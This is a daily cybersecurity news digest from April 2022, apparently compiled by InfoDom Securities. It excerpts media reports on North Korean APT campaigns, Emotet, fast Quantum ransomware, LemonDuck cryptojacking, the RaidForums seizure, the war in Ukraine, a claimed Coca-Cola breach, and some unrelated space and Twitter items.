Wednesday, April 27, 2022 // (IG): BB //Weekly Sponsor: Unsafe Waters
Chinese drone-maker DJI suspends ops in Russia, Ukraine
FROM THE MEDIA: In a first for a major Chinese tech company, drone-maker DJI Technologies announced on Tuesday that it will temporarily suspend business in both Russia and Ukraine.
"DJI is internally reassessing compliance requirements in various jurisdictions. Pending the current review, DJI will temporarily suspend all business activities in Russia and Ukraine. We are engaging with customers, partners and other stakeholders regarding the temporary suspension of business operations in the affected territories," declared DJI in a canned statement.
Last week the company issued another statement clarifying that it did not market or sell its products for military use and "unequivocally opposed attempts to attach weapons to [its] products." DJI also said it "refused to customize or enable modifications that would enable [its] products for military use."
"We want to reiterate a position we have long held: our products are made to improve people's lives and benefit the world, and we absolutely deplore any use of our products to cause harm. DJI has only ever made products for civilian use; they are not designed for military applications," insisted DJI.
READ THE STORY: The Record
A “Naver”-ending game of Lazarus APT
FROM THE MEDIA: Zscaler’s ThreatLabz research team has been closely monitoring a campaign targeting users in South Korea. This threat actor has been active for more than a year and continues to evolve its tactics, techniques, and procedures (TTPs); we believe with high confidence that the threat actor is associated with Lazarus Group, a sophisticated North Korean advanced persistent threat (APT) group.
In 2021, the main attack vector used by this threat actor was credential phishing attacks through emails, posing as Naver, the popular South Korean search engine and web portal.
In 2022, the same threat actor started spoofing various important entities in South Korea, including KRNIC (Korea Internet Information Center), Korean security vendors such as Ahnlab, cryptocurrency exchanges such as Binance, and others. Some details about this campaign were published in this Korean blog, however they did not perform the threat attribution.
Even though the TTPs of this threat actor evolved over time, there were critical parts of their infrastructure that were reused, allowing ThreatLabz to correlate the attacks and do the threat attribution with a high-confidence level. Our research led us to the discovery of command-and-control (C2) domains even before they were used in active attacks by the threat actor. This proactive discovery of attacker infrastructure helps us in preempting the attacks.
In this blog, we will share the technical details of the attack chains, and will explain how we correlated this threat actor to Lazarus.
READ THE STORY: Security Boulevard
Emotet botnet tests new techniques after global crackdown
FROM THE MEDIA: Emotet was widely considered one of the most prolific botnets in recent history. At the time of the international crackdown in January 2021, Emotet had infected more than 1.6 million computers globally. It cost hundreds of millions of dollars in damage, according to the Department of Justice.
The law enforcement action disrupted the Emotet activity, but did not completely shut down the operation. Emotet, linked to the threat actor TA542 or Mummy Spider, began to reemerge around November 2021, according to researchers.
“TA542 resumed its high volume threat activity attempting to distribute Emotet malware via email,” Sherrod DeGrippo, VP threat research and detection at Proofpoint said. “The January law enforcement activity was focused on disrupting the botnet infrastructure and did not include arrests.”
A key reason for Emotet threat actor testing the new techniques is likely linked to recent actions by Microsoft to cut off its previous attack techniques, according to Proofpoint researchers. Microsoft in February announced it would begin blocking Visual Basic for Application macros by default starting in April. In July 2021, Microsoft announced plans to also disable XL4 macros.
READ THE STORY: Cyber Security Dive
Sun shoots out huge solar flare with freak event causing radio blackout on Earth
FROM THE MEDIA: The Sun spat out a huge solar flare this week before the freak solar event caused a radio blackout on Earth, it has been reported.
The rogue sunspot, dubbed AR2993, sputtered twice from the surface in rapid succession on Monday.
It produced an "overlapping of M1-class solar flares", it has been reported.
A solar flare is a brief eruption of energy-dense radiation from the surface of a star - which can disrupt radio and magnetic signals on Earth.
Flares that fall into the M-Class category are moderately sized, and have the potential to affect the Earth's polar regions and radio frequencies.
Monday's eruption caused a minor radio blackout in South-East Asia and Australia, SpaceWeather reports.
The experts explained to SpaceWeather : "The double-blast caused a minor albeit long-lasting radio blackout over southeast Asia and Australia."
The flares can also expose astronauts to higher levels of radiation during their missions.
READ THE STORY: Mirror
Nation-state Hackers Target Journalists with Goldbackdoor Malware
FROM THE MEDIA: According to security researchers at Stairwell, a recent campaign by APT37 used sophisticated malware to steal information about sources. The threat group appears to be utilizing a malware that is a successor of Bluelight called Goldbackdoor. Goldbackdoor is believed to be tied to the North Korean government due to its usage in actively targeting journalists with the goal of stealing sensitive information. Researchers state that the campaign began in March and is still active.
Stairwell researchers followed up on an initial report released by South Korea’s NK News, which detailed the campaign perpetrated by the North Korean-linked threat actor. In one instance, the cyberattackers stole from the private computer of a former South Korean intelligence official. In addition, the threat actor attempted to impersonate NK News and distribute a novel malware targeting journalists who were using sources. NK News offered Stairwell certain details to aid their investigation into the incidents.
READ THE STORY: OODA Loop
4-Hour Time-to-Ransom Seen in Quantum Attack as Accelerated Ransomware Increasingly Common
FROM THE MEDIA: As part of a recent cyberattack, threat actors deployed ransomware less than four hours after compromising the victim’s environment, according to researchers with The DFIR Report.
The attack started with an IcedID payload being deployed on a user endpoint and led to the execution of Quantum ransomware only three hours and 44 minutes later. DFIR Report researchers described it as one of the fastest ransomware attacks they have observed to date.
In a Ryuk ransomware attack in October 2020, the threat actors started encrypting the victim’s data only 29 hours after the initial breach, but the median global dwell time for ransomware is roughly 5 days, according to Mandiant’s M-Trends 2022 report.
Once the ransomware has been executed, however, the victim’s data may be encrypted within minutes. A recent report from Splunk shows that ransomware needs an average of 43 minutes to encrypt data, while the fastest encryption time is less than 6 minutes.
The IcedID payload in the analyzed Quantum ransomware incident was contained within an ISO image that was likely delivered via email. The malware was hidden in the form of a file named “document,” which was a LNK file designed to execute a DLL (IcedID).
Once the DLL was executed, numerous discovery tasks ran leveraging various built-in Windows utilities, and a scheduled task was created to achieve persistence.
READ THE STORY: Security Week
CrowdStrike Details LemonDuck Cryptojacking Container Attack Campaign
FROM THE MEDIA: CrowdStrike has published an alert detailing an active campaign that uses compromised containers to mine for cryptocurrency on Linux platforms launched via a botnet known as LemonDuck.
LemonDuck is a cryptomining botnet that previously was seen targeting Microsoft Exchange servers via the ProxyLogon vulnerability that enables it to use malware such as EternalBlue and BlueKeep to mine cryptocurrency, escalate privileges and move laterally across networks.
Specifically, it runs a malicious container on an exposed Docker API by using a custom Docker ENTRYPOINT to download a core.png image file that is disguised as a Bash script. The file “core.png” was downloaded from a domain t.m7n0y[.]com, which is associated with LemonDuck. The domain has a self-signed certificate installed that was generated in May 2021 with an expiration date set for May 2022. The unique certificate signatures lead to other domains that are actively used by this threat actor and that might be the command-and-control mechanism used to manage the overall campaign.
READ THE STORY: Container Journal
Police Seize RaidForums Hacking Site, Detaining Its Founder and Accomplices
FROM THE MEDIA: U.S. law enforcement seized RaidForums hacking site and detained its founder and administrator, Diogo Santos Coelho, and two accomplices in operation TOURNIQUET.
The operation also saw “RaidForums.com,” “Rf.ws,” and “Raid.Lol” domains seized and the website’s computer infrastructure accessed.
Europol’s Joint Cybercrime Action coordinated the year-long operation involving multiple law enforcement agencies in the U.S., the UK, Sweden, Portugal, and Romania.
Launched in 2015, RaidForums deals in selling stolen databases, account credentials, credit card details, and Social Security numbers.
RaidForums hacking site operates on the regular Internet instead of the dark web. It started as a forum for organized harassment, including swatting, before becoming an online marketplace for stolen information.
Babuk ransomware and Lapsus$ extortion gangs were among the high-profile threat actors who used the website.
READ THE STORY: CPO
State Dept offering $10 million for information on Russian cyber criminals
FROM THE MEDIA: The State Department has announced it is offering a reward of up to $10 million for information on a group of Russian cybercriminals
In a press release on Tuesday, the department said its Rewards for Justice (RFJ) program is seeking information on six individuals who are allegedly connected to a criminal conspiracy involving malicious cyber activities affecting U.S. critical infrastructure.
The individuals were a part of the criminal conspiracy that took part in a destructive malware infection of computers worldwide in June 2017 using malware referred to as NotPetya, the State Department alleged.
The reported attack caused damage to computers of hospitals and other medical facilities in the Heritage Valley Health System in Pennsylvania, one of the largest manufacturers of pharmaceuticals in the U.S., and other U.S. private sector entities.
The attack collectively cost all of the targeted U.S. entities nearly $1 billion in losses, according to the State Department.
READ THE STORY: The Hill
How does Ukraine keep intercepting Russian military communications?
FROM THE MEDIA: Russia is regarded as one of the world's most advanced countries when it comes to anything and everything related to spying, and that includes secretive, high-tech military communications.
For Russian leader Vladimir Putin, a former intelligence officer, this is a particular point of pride. Yet Russia's reputation has taken a major blow with the often bumbling way the military has handled communications in Ukraine.
Here's a look at how the Ukrainians have effectively countered the Russians on multiple fronts:
Q. Ukraine keeps publicly releasing what it says are intercepted Russian communications from the battlefield. Wouldn't Ukraine want to keep this under wraps?
Ukraine feels there are huge public relations benefits in releasing intercepted material that's either embarrassing to Russia or points to Russian wrongdoing, possibly even atrocities.
Ukraine's military intelligence recently put out audio on social media, saying that as two Russian military members were speaking, one called for Ukrainian prisoners of war to be killed.
"Keep the most senior among them, and let the rest go forever. Let them go forever, damn it, so that no one will ever see them again, including relatives," a voice says on the tape.
READ THE STORY: NPR
Russia’s war could spread to space, the U.S. should be prepared
FROM THE MEDIA: In both cyber and space, nefarious and destructive actions can be difficult to attribute to a specific actor or sponsoring nation-state. In the cyber realm, experts puzzle that we haven’t yet experienced a Russian cyber attack given the capability displayed during the Colonial Pipeline ransomware disruption.
So far, Western banks and corporations’ defensive measures may account for the success. Or Russia may be walking a cyber tightrope — seeking not to cross the line of an “act of war” and hazard a U.S. or NATO response.
But there are troubling signs that the cyber détente may not hold for space. Putin recently chose an ominous location for his first public appearance since the retreat of Russian forces around Kyiv. Putin addressed Russian space agency workers from the backdrop of a Russian space rocket and stated peace efforts in Ukraine were at “a dead end.”
Not being the first veiled warning, it is clear the United States is receiving the message. Vice President Kamala Harris announced that the United States has committed to not conducting destructive, direct-ascent anti-satellite (ASAT) missile testing. This is an indicator of just how seriously Washington is taking Russian threats. Yet, a self-imposed ban on ASAT tests is not enough.
As background, recall that in November 2021, while amassing forces on Ukraine’s borders, Russia launched an ASAT satellite missile that destroyed one of its own satellites in orbit. It caused hazardous orbital debris and at the time seemed senseless. Russian authorities blathered and quibbled.
In hindsight, Russia’s demonstration of offensive space capabilities was on their pre-invasion checklist.
READ THE STORY: Spacenews
Pro-Russia hackers were inside Ukraine government networks long before the ground war started
FROM THE MEDIA: The cybersecurity company Trellix says pro-Russia hackers had infiltrated the networks of numerous Ukrainian government agencies long before Russia’s ground invasion started in late February. In fact, hackers had planted malicious code in the networks even before Russian troops began assembling at the Ukrainian border in 2021.
These findings were part of a broader report on the global cyberthreat environment from San Jose, California-based Trellix, which was created last year via a merger between cybersecurity firms FireEye and McAfee Enterprise. The firm bases its findings on an analysis of data collected from organizations using McAfee Enterprise software.
The Trellix analysts found evidence of “wiper” malware that was later activated remotely to delete all content on the hard drives of Ukrainian government computers. The malware matched the signature of malware used in the past by actors known to be associated with the Russian government, says Christiaan Beek, lead scientist and principal engineer at Trellix’s Threat Labs division. The malware also originated from the same time zone as Moscow’s, Beek says, adding that some instances of the malware may have come from others acting on Russia’s behalf.
READ THE STORY: Fastcompany
Russian-linked hackers says they've HACKED Coca-Cola: Stormous claims it has stolen financial data, passwords and accounts as they put it up for sale for $640,000 or 16 million Bitcoin
FROM THE MEDIA: A group of Russian-linked hackers claimed to have hacked Coca-Cola and put rucks of data up for sale.
Stormous said it stole 161 gigabytes of financial data, passwords and accounts before putting the information on the market for $640,000 or 16 million Bitcoin.
The team revealed on Monday it had infiltrated the drinks company and got out 'without their knowledge'. Coca-Cola said it has launched an urgent investigation and already contacted the police.
'You will win and we will win,' read an apparent message from the group, which was later posted on Twitter.
'You will also contact us! We will explain more,' the message, in apparently broken English, continues. 'Good deal, we'll give you the right to pay the amount you want depending on the amount of data you want.'
It said the group downloaded 161 gigabytes from the company, which it would sell for more than $640,000 or more than 16 million in Bitcoin.
Among the stolen files, according to CISO Advisor, are financial data, passwords and commercial accounts.
READ THE STORY: Dailymail
Items of interest
EU Official Tweets a Warning to Elon Musk
FROM THE MEDIA: Elon Musk vowed to prioritize free speech as Twitter Inc.’s new owner, but a senior official from the European Union has warned the world’s richest person will still have to contend with the region’s strict content rules, just like any other social media company.
“Be it cars or social media, any company operating in Europe needs to comply with our rules--regardless of their shareholding,” said Internal Market Commissioner Thierry Breton, in a tweet Tuesday. “Mr Musk knows this well.”
In an interview with Bloomberg, Breton also added that Twitter will need to do more to combat hate speech, harassment and revenge porn.
Large platforms like Twitter, “they will have to have more moderators, they will have to make sure that all the moderators will speak the language in the country where they operate,” said Breton.
The EU approved the Digital Services Act over the weekend, giving European governments new power to take down illegal content, and demand platforms do more to tackle harmful content.
READ THE STORY: Bloomberg
Elon Musk turns attention to Starship problems immediately after buying Twitter (Video)
FROM THE MEDIA: SpaceX Starship Booster 7's damage from cryo testing has been leaked. Starlink is coming to Hawaiian Airlines. Axiom-1 returns to Earth. Crew-4 is launching tonight.
Solar Flare causes Radio Blackout in Asia & Australia (Video)
FROM THE MEDIA: The Sun is erupting & emitting solar flares. On Sunday, one such solar flare caused a radio blackout in Asia & Australia. What is a solar flare? How is it caused? Is it dangerous for human beings? Molly Gambhir brings you a report.
About this Product
These open source products are reviewed from analysts at InfoDom Securities and provide possible context about current media trends in regard to the realm of cyber security. The stories selected cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not specifically endorse any third-party claims made in their original material or related links on their sites, and the opinions expressed by third parties are theirs alone. Contact InfoDom Securities at dominanceinformation@gmail.com